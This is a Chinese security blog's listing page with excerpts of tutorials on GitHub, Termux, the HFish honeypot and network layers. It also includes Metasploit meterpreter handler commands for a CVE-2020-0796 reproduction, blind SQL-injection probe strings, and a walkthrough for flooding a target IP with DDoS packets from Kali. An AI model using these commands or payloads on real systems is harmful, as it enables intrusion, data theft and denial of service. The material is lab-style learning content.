- 博客(9)
- 收藏
- 关注
RSS订阅原创 Windows10-CVE-2020-0796漏洞复现
4.输入如下命令use exploit/multi/handlerset payload windows/x64/meterpreter/bind_tcpset lport4444set rhost 目标ip地址run这时候,只要靶机运行了该木马病毒,即可被控制,我们可以通过终端操作此电脑ps:有可能出现编码错误的情况,些许字符可能会变成未知符号。
2023-08-08 06:28:51
453
1
原创 github基础教程
点击创建新的仓库,然后,在Repository name的位置写上仓库名,然后滑到最下面,点击Create repository,创建成功仓库后,便开始创建第一个文件,记住,第一个文件不管后缀,名称必须是index,然后输入index文件的代码,划到最下面,点击Commit new file保存文件,随后,点击。,看到右上角的sign up,点击,进去之后,会有一个黑色方框,在这里输入你的邮箱,然后在password栏中输入你要设置的密码,后面就是设置用户名等基础操作了。
2023-04-30 09:32:20
165
原创 Termux 入门与实践
Termux 是一款安卓平台下模拟Linux环境的app。可以直接使用,无需root或额外设置。支持apt进行软件包管理。
2023-04-25 15:09:22
1346
原创 SQL一日通(下)
e) from TestDB.dbo.admin时)=8abc.asp运行正常,则第一个用户名的长度为8 HTTP://xxx.xxx.xxx/abc.asp?ascii(substring(username,m,1)) from TestDB.dbo.admin)=n (m的值在1到上一步得到的用户名长度之间,当m=1,2,3,…p=YY and (select …2、浏览TEMP表的方法是:(假设TestDB是当前连接的数据库名) HTTP://xxx.xxx.xxx/abc.asp?
2023-04-25 12:25:42
161
原创 SQL一日通(上)
SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的web页面访问没什么区别,所以目前市面的防火墙都不会对SQL注入发出警报,如果管理员没查看IIS日志的习惯,可能被入侵很长时间都不会发觉,但是,SQL注入的手法相当灵活,在注入的时候会碰到很多意外的情况,能不能根据具体情况进行分析,构造巧妙的SQL语句,从而成功获取想要的数据。p=YY and 1=1,abc.asp运行正常,而且与HTTP://xxx.xxx.xxx/abc.asqp?
2023-04-25 11:29:34
118
原创 安卓用termux安装kaliLinux教程
Termux是一个Android下一个高级的终端模拟器,开源且不需要root,支持apt管理软件包,十分方便安装软件包, 完美支持Python, PHP, Ruby, Go, Nodejs, MySQL等。注意:有时候可能你已经给了termux读写sdcard卡的权限,也重启了手机,但是依然还会报这个错误,却又能进去kali,这个我也不知道为什么,可能是手机的原因吧。必须是先走安装步骤成功后,再去开启读写sdcard卡的权限,然后要重启手机,最后再次进入termux才会生效。
2023-04-24 14:50:27
11692
7
原创 windows安装HFish教程
有机会接触了一下蜜罐的安装和使用情况HFish是一款社区型免费蜜罐,侧重企业安全场景,从内网失陷检测、外网威胁感知、威胁情报生产三个场景出发,为用户提供可独立操作且实用的功能,通过安全、敏捷、可靠的中低交互蜜罐增加用户在失陷感知和威胁情报领域的能力。HFish具有超过40种蜜罐环境、提供免费的云蜜网、可高度自定义的蜜饵能力、一键部署、跨平台多架构、国产操作系统和CPU支持、极低的性能要求、邮件/syslog/webhook/企业微信/钉钉/飞书告警等多项特性,帮助用户降低运维成本,提升运营效率。
2023-04-24 14:38:14
1114
2
原创 网络七层协议
该层为上层协议提供了一个传输数据的物理媒体。1.1 协议的分层概念:ISO在指定标准的OSI之前,提出了作为通信协议设计指标的OSI参考模型,将协议分为七层,使得原来复杂的网络协议更加简单化定义:在七层模型中,每个分层都接受由它下一层所提供的特定服务,并且负责为自己的上一层提供特定的服务,上下层之间进行交互所遵循的约定叫做“接口”,同一层之间的交互所遵循的约定叫做“协议”协议分层的优点:每个分层可以独立使用,其实系统中某些分层发生变化,也不会影响整个系统,因此可以构造一个扩展性和灵活性都比较强的系统;
2023-04-24 09:41:07
3184
5
原创 kali中安装DDoS攻击本地发包
Attack Port即攻击端口,一般服务器默认为80(更多内容请百度)即可获得攻击对象的IP地址。(获取IP后Ctrl+C可以结束ping)Attack Speed即攻击速度,数值越大越快,最大不能超过1000。按下回车,即已经开始向该IP发起DDos攻击,也就成功了。这样,用于DDos的数据包就已经下载到了你的Kali上了。然后回到刚刚的命令行窗口,输入ping到的IP地址。然后输入攻击对象的IP。
2023-04-24 08:33:09
2749
3
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人